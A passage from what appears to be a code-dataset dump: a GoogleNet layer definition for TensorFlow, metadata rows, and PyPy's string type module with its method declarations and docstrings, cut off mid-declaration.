.conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))
(self.feed('inception_4a_output')
.max_pool(3, 3, 1, 1, name='inception_4b_pool')
.conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))
(self.feed('inception_4b_1x1',
'inception_4b_3x3',
'inception_4b_5x5',
'inception_4b_pool_proj')
.concat(3, name='inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))
(self.feed('inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
.conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))
(self.feed('inception_4b_output')
.conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))
(self.feed('inception_4b_output')
.max_pool(3, 3, 1, 1, name='inception_4c_pool')
.conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))
(self.feed('inception_4c_1x1',
'inception_4c_3x3',
'inception_4c_5x5',
'inception_4c_pool_proj')
.concat(3, name='inception_4c_output')
.conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))
(self.feed('inception_4c_output')
.conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
.conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))
(self.feed('inception_4c_output')
.conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))
(self.feed('inception_4c_output')
.max_pool(3, 3, 1, 1, name='inception_4d_pool')
.conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))
(self.feed('inception_4d_1x1',
'inception_4d_3x3',
'inception_4d_5x5',
'inception_4d_pool_proj')
.concat(3, name='inception_4d_output')
.conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))
(self.feed('inception_4d_output')
.conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))
(self.feed('inception_4d_output')
.conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))
(self.feed('inception_4d_output')
.max_pool(3, 3, 1, 1, name='inception_4e_pool')
.conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))
(self.feed('inception_4e_1x1',
'inception_4e_3x3',
'inception_4e_5x5',
'inception_4e_pool_proj')
.concat(3, name='inception_4e_output')
.max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
.conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))
(self.feed('pool4_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_5a_pool')
.conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))
(self.feed('inception_5a_1x1',
'inception_5a_3x3',
'inception_5a_5x5',
'inception_5a_pool_proj')
.concat(3, name='inception_5a_output')
.conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))
(self.feed('inception_5a_output')
.conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
.conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))
(self.feed('inception_5a_output')
.conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))
(self.feed('inception_5a_output')
.max_pool(3, 3, 1, 1, name='inception_5b_pool')
.conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))
(self.feed('inception_5b_1x1',
'inception_5b_3x3',
'inception_5b_5x5',
'inception_5b_pool_proj')
.concat(3, name='inception_5b_output')
.avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
.fc(1000, relu=False, name='loss3_classifier')
.softmax(name='prob'))
| 41.539683
| 72
| 0.531907
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
def setup(self):
(self.feed('data')
.conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
.max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
.lrn(2, 2e-05, 0.75, name='pool1_norm1')
.conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='conv2_3x3')
.lrn(2, 2e-05, 0.75, name='conv2_norm2')
.max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
.conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
.conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
.conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))
(self.feed('pool2_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_3a_pool')
.conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))
(self.feed('inception_3a_1x1',
'inception_3a_3x3',
'inception_3a_5x5',
'inception_3a_pool_proj')
.concat(3, name='inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))
(self.feed('inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))
(self.feed('inception_3a_output')
.conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
.conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))
(self.feed('inception_3a_output')
.max_pool(3, 3, 1, 1, name='inception_3b_pool')
.conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))
(self.feed('inception_3b_1x1',
'inception_3b_3x3',
'inception_3b_5x5',
'inception_3b_pool_proj')
.concat(3, name='inception_3b_output')
.max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
.conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
.conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
.conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))
(self.feed('pool3_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_4a_pool')
.conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))
(self.feed('inception_4a_1x1',
'inception_4a_3x3',
'inception_4a_5x5',
'inception_4a_pool_proj')
.concat(3, name='inception_4a_output')
.conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))
(self.feed('inception_4a_output')
.conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
.conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))
(self.feed('inception_4a_output')
.conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))
(self.feed('inception_4a_output')
.max_pool(3, 3, 1, 1, name='inception_4b_pool')
.conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))
(self.feed('inception_4b_1x1',
'inception_4b_3x3',
'inception_4b_5x5',
'inception_4b_pool_proj')
.concat(3, name='inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))
(self.feed('inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
.conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))
(self.feed('inception_4b_output')
.conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))
(self.feed('inception_4b_output')
.max_pool(3, 3, 1, 1, name='inception_4c_pool')
.conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))
(self.feed('inception_4c_1x1',
'inception_4c_3x3',
'inception_4c_5x5',
'inception_4c_pool_proj')
.concat(3, name='inception_4c_output')
.conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))
(self.feed('inception_4c_output')
.conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
.conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))
(self.feed('inception_4c_output')
.conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))
(self.feed('inception_4c_output')
.max_pool(3, 3, 1, 1, name='inception_4d_pool')
.conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))
(self.feed('inception_4d_1x1',
'inception_4d_3x3',
'inception_4d_5x5',
'inception_4d_pool_proj')
.concat(3, name='inception_4d_output')
.conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))
(self.feed('inception_4d_output')
.conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))
(self.feed('inception_4d_output')
.conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))
(self.feed('inception_4d_output')
.max_pool(3, 3, 1, 1, name='inception_4e_pool')
.conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))
(self.feed('inception_4e_1x1',
'inception_4e_3x3',
'inception_4e_5x5',
'inception_4e_pool_proj')
.concat(3, name='inception_4e_output')
.max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
.conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))
(self.feed('pool4_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_5a_pool')
.conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))
(self.feed('inception_5a_1x1',
'inception_5a_3x3',
'inception_5a_5x5',
'inception_5a_pool_proj')
.concat(3, name='inception_5a_output')
.conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))
(self.feed('inception_5a_output')
.conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
.conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))
(self.feed('inception_5a_output')
.conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))
(self.feed('inception_5a_output')
.max_pool(3, 3, 1, 1, name='inception_5b_pool')
.conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))
(self.feed('inception_5b_1x1',
'inception_5b_3x3',
'inception_5b_5x5',
'inception_5b_pool_proj')
.concat(3, name='inception_5b_output')
.avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
.fc(1000, relu=False, name='loss3_classifier')
.softmax(name='prob'))
| true
| true
|
790c7801f182960ff2919d3799dd5e962f483844
| 18,300
|
py
|
Python
|
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 1
|
2019-05-27T00:58:46.000Z
|
2019-05-27T00:58:46.000Z
|
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/objspace/std/stringtype.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.sharesmallstr:
if space.config.objspace.std.withprebuiltchar:
# share characters and empty string
if len(s) <= 1:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
else:
s = s[0] # annotator hint: a single char
return wrapchar(space, s)
else:
# only share the empty string
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(s))
return W_StringObject(s)
def wrapchar(space, c):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.withprebuiltchar:
if space.config.objspace.std.withrope:
return W_RopeObject.PREBUILT[ord(c)]
return W_StringObject.PREBUILT[ord(c)]
else:
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(c))
return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
assert start >= 0
assert stop >= 0
assert not space.config.objspace.std.withrope
if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
return orig_obj
if space.config.objspace.std.withstrslice:
from pypy.objspace.std.strsliceobject import W_StringSliceObject
# XXX heuristic, should be improved!
if (stop - start) > len(s) * 0.20 + 40:
return W_StringSliceObject(s, start, stop)
return wrapstr(space, s[start:stop])
def joined(space, strlist):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject(strlist)
else:
return wrapstr(space, "".join(strlist))
def joined2(space, str1, str2):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject([str1, str2])
else:
return wrapstr(space, str1 + str2)
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',), #unicode mimic not supported now
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
# ____________________________________________________________
def descr__new__(space, w_stringtype, w_object=''):
# NB. the default value of w_object is really a *wrapped* empty string:
# there is gateway magic at work
from pypy.objspace.std.stringobject import W_StringObject
w_obj = space.str(w_object)
if space.is_w(w_stringtype, space.w_str):
return w_obj # XXX might be reworked when space.str() typechecks
value = space.str_w(w_obj)
if space.config.objspace.std.withrope:
from pypy.objspace.std.ropeobject import rope, W_RopeObject
w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
return w_obj
else:
w_obj = space.allocate_instance(W_StringObject, w_stringtype)
W_StringObject.__init__(w_obj, value)
return w_obj
# ____________________________________________________________
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
# ____________________________________________________________
# Helpers for several string implementations
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
begin = end - len(suffix)
if begin < start:
return False
for i in range(len(suffix)):
if u_self[begin+i] != suffix[i]:
return False
return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
stop = start + len(prefix)
if stop > end:
return False
for i in range(len(prefix)):
if u_self[start+i] != prefix[i]:
return False
return True
| 55.287009
| 87
| 0.549727
|
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.sharesmallstr:
if space.config.objspace.std.withprebuiltchar:
if len(s) <= 1:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
else:
s = s[0]
return wrapchar(space, s)
else:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(s))
return W_StringObject(s)
def wrapchar(space, c):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.withprebuiltchar:
if space.config.objspace.std.withrope:
return W_RopeObject.PREBUILT[ord(c)]
return W_StringObject.PREBUILT[ord(c)]
else:
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(c))
return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
assert start >= 0
assert stop >= 0
assert not space.config.objspace.std.withrope
if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
return orig_obj
if space.config.objspace.std.withstrslice:
from pypy.objspace.std.strsliceobject import W_StringSliceObject
if (stop - start) > len(s) * 0.20 + 40:
return W_StringSliceObject(s, start, stop)
return wrapstr(space, s[start:stop])
def joined(space, strlist):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject(strlist)
else:
return wrapstr(space, "".join(strlist))
def joined2(space, str1, str2):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject([str1, str2])
else:
return wrapstr(space, str1 + str2)
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
